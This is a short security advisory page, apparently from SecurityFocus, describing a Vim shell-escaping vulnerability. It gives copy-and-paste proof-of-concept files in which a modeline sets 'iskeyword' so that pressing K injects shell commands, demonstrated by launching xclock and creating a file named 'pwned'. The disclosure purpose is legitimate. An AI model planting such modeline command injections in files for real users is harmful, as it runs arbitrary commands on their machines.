Vim Insufficient Shell Escaping Multiple Command Execution Vulnerabilities

The following exploit information is available:

Copy-and-paste these examples into separate files:

;xclock
vim: set iskeyword=;,@

Place your cursor on ``xclock'', and press K. xclock appears.

;date>>pwned
vim: set iskeyword=1-255

Place your cursor on ``date'' and press K. File ``pwned'' is created in
the current working directory.

Please note: If modeline processing is disabled, set the 'iskeyword'
option manually.


 

Privacy Statement
Copyright 2010, SecurityFocus